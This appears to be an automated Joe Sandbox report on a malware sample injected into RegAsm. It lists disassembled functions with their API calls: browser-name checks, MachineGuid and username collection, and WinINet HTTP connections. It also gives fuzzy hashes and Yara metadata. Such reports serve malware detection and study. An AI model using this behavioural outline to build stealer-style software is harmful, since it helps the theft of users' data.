                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1D0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040EA0C
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                            • Opcode ID: 18791422d01b2b13ff7cce6aa6d3a16512c44e5a7782d8cda56edd64747c20fc
                                                                                                                                                                                                            • Instruction ID: d1c1f6d426c51b72db25c032f67bdcfcc5c272aed1b8a8b26893b2afd0a9f6bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18791422d01b2b13ff7cce6aa6d3a16512c44e5a7782d8cda56edd64747c20fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D324A74900348DFCB24EFA9C545ADEBBF5BF48304F10852EE85AA7781D774AA08CB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040E849 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 507COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040E8E5
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1D0,?,?,?,?,?,?,?,?,?,?,?,00000000,00421714,000000FF), ref: 0040EA0C
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                              • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\$ Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-4033978473
                                                                                                                                                                                                            • Opcode ID: 512764be5562c6f9ee5c119fc0ec7e9dcec457ec7b2beeb7da681ad73ee63a04
                                                                                                                                                                                                            • Instruction ID: 3a62ecb7a9c6cf29fb23cf1ec657087ede18c15969f1ae5c452feb47c452b9ec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 512764be5562c6f9ee5c119fc0ec7e9dcec457ec7b2beeb7da681ad73ee63a04
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47324B74900348DFCB24EFA9C545ADEBBF5BF48304F10852EE94AA7781D774AA08CB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00418360 Relevance: 10.6, APIs: 7, Instructions: 69sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00418460: LoadLibraryA.KERNEL32(kernel32.dll,00418370), ref: 00418465
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(00000000,00CAF390), ref: 00418480
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF1B0), ref: 004184AD
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF210), ref: 004184C6
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF2E8), ref: 004184DE
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4E0), ref: 004184F6
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2F10), ref: 0041850F
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2A40), ref: 00418527
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2C60), ref: 0041853F
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF498), ref: 00418558
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4F8), ref: 00418570
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4C8), ref: 00418588
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF510), ref: 004185A1
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CB2A60), ref: 004185B9
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF528), ref: 004185D1
                                                                                                                                                                                                              • Part of subcall function 00418460: GetProcAddress.KERNEL32(74DD0000,00CAF4B0), ref: 004185EA
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 00410100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                              • Part of subcall function 00410100: HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                              • Part of subcall function 00410100: GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CB2F60,?,0042769C,?,00000000,004271D3), ref: 004183E2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004183F1
                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 004183FC
                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418412
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041842C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041843A
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00418442
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitLibraryLoadNameSleepUserlstrcatlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3002421637-0
                                                                                                                                                                                                            • Opcode ID: 2cd6f762932766e9605dba5f80317368f40d4b12d43fa0529bb3342c5731a12b
                                                                                                                                                                                                            • Instruction ID: f5d698ad6a55bc7df13a6bb85b3ba19d98d9c2d1eab502fd2d081fafcba8c108
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd6f762932766e9605dba5f80317368f40d4b12d43fa0529bb3342c5731a12b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F214271A40105ABDB10FBA1EC5AFEE7379AF14705F50003EFA02B20D1EF78690986A9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00404350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 1274457161-4251816714
                                                                                                                                                                                                            • Opcode ID: 446ef9e693da80d51f2820abbbb1ede620b0bcb139886afd1743661b67f9f94b
                                                                                                                                                                                                            • Instruction ID: ab3394d741f3e36a82850ac668d884f81d7e6f090efc3e69c1e34f38219adf05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 446ef9e693da80d51f2820abbbb1ede620b0bcb139886afd1743661b67f9f94b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2212EB1D04208ABDB10DFA4D845BDEBB78EB05724F10463EFA15A76C1DB385A498B94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410B10 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00410B35
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B52
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B74
                                                                                                                                                                                                            • CharToOemA.USER32(00000000,?), ref: 00410B92
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                            • API String ID: 1728412123-1211650757
                                                                                                                                                                                                            • Opcode ID: 460e63b097fa880e84c33a31200c2a4b3e5d5a2440125ca42057d3b2580e177a
                                                                                                                                                                                                            • Instruction ID: 4553c178b8cc77de03e31e7a0bf4b1ccb562fe7c8fc2bebded05eaa22e454475
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 460e63b097fa880e84c33a31200c2a4b3e5d5a2440125ca42057d3b2580e177a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4601F779A4431DFBEB60CB90DC4AFDAB77C9B14704F1001D9F648A21C0EAB46BC88B64
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410560 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8), ref: 0041056E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8,00000000), ref: 00410575
                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410595
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004105BB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                            • String ID: %d MB$@
                                                                                                                                                                                                            • API String ID: 3644086013-3474575989
                                                                                                                                                                                                            • Opcode ID: 4a1422dfbed24fc6ef6429690694f72c2887c650deb5320c2eb88bdccb7f9604
                                                                                                                                                                                                            • Instruction ID: 0ef3927e3980d66fe15a8692298ef3118b0a89c6d208e01184595feb598ce5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a1422dfbed24fc6ef6429690694f72c2887c650deb5320c2eb88bdccb7f9604
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF03C71A54214ABEB04DBE4DD0AFBE776DEB05741F400119FB05E72C0D7B49C4187A9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004152B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                            • String ID: cA$ cA
                                                                                                                                                                                                            • API String ID: 4198075804-3778338052
                                                                                                                                                                                                            • Opcode ID: c3aae48a16232a5e7020c947806af114eb6cfe174c31152e905b58f75a2b960b
                                                                                                                                                                                                            • Instruction ID: d1e0ae6e5de9dab54f35b52797b1687887d23062d4b9c1c35c51d6007455458d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3aae48a16232a5e7020c947806af114eb6cfe174c31152e905b58f75a2b960b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68414E34804248EEDB15EFE5C985ADDBB74AF18344F50417EEC06236C1DB785A4DCBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00417AE0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 607networksleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2A80), ref: 004187C5
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2AE0), ref: 004187DD
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDB58), ref: 004187F6
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA08), ref: 0041880E
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD9D8), ref: 00418826
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA20), ref: 0041883F
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB4048), ref: 00418857
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD888), ref: 0041886F
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDA38), ref: 00418888
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBD8D0), ref: 004188A0
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDAC8), ref: 004188B8
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2B00), ref: 004188D1
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB28E0), ref: 004188E9
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2820), ref: 00418901
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CB2900), ref: 0041891A
                                                                                                                                                                                                              • Part of subcall function 004187B0: GetProcAddress.KERNEL32(74DD0000,00CBDAE0), ref: 00418932
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417D80
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417D97
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                              • Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                              • Part of subcall function 00404420: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                              • Part of subcall function 00404420: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                              • Part of subcall function 00412670: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417E0E), ref: 004126A8
                                                                                                                                                                                                              • Part of subcall function 00412670: ExitProcess.KERNEL32 ref: 004126B3
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                              • Part of subcall function 00405BC0: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                              • Part of subcall function 004120F0: strtok_s.MSVCRT ref: 00412130
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00418187
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                              • Part of subcall function 00413490: strtok_s.MSVCRT ref: 004134CE
                                                                                                                                                                                                              • Part of subcall function 00413490: strtok_s.MSVCRT ref: 00413591
                                                                                                                                                                                                              • Part of subcall function 00411BF0: memset.MSVCRT ref: 00411C2B
                                                                                                                                                                                                              • Part of subcall function 00405BC0: HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                              • Part of subcall function 00405BC0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
